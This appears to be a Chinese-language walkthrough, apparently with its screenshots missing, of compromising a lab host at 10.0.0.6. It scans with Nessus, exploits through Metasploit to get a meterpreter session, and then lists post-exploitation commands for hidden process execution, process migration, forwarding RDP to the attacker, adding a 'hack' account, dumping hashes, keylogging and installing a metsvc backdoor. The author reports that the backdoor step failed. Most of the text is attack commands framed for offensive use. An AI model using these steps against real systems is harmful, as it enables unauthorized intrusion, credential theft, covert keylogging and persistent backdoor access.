受害者IP:10.0.0.6
2、攻击
首先使用Nessus进行扫描
扫描结果
我们将结果导出来,然后导入msfconsole中
使用vulns进行漏洞分析
查找对应的漏洞
使用漏洞进行攻击
这时候我们就获得了一个meterpreter
3、控制后门
测试是否是虚拟机:
迁移进程,防止当前进程被删除
ps:查看进程
migrate pid:迁移进程
execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互
getpid:获取进程号
getuid:查看权限
sysinfo:系统信息
端口转发
portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678
run getgui –u hack –p hack:添加账户
rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地
获取hash
键盘监听
keyscan_start:启动监听
keyscan_stop:停止
keyscan_dump:查看
后门一:metsvc
然后使用
我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)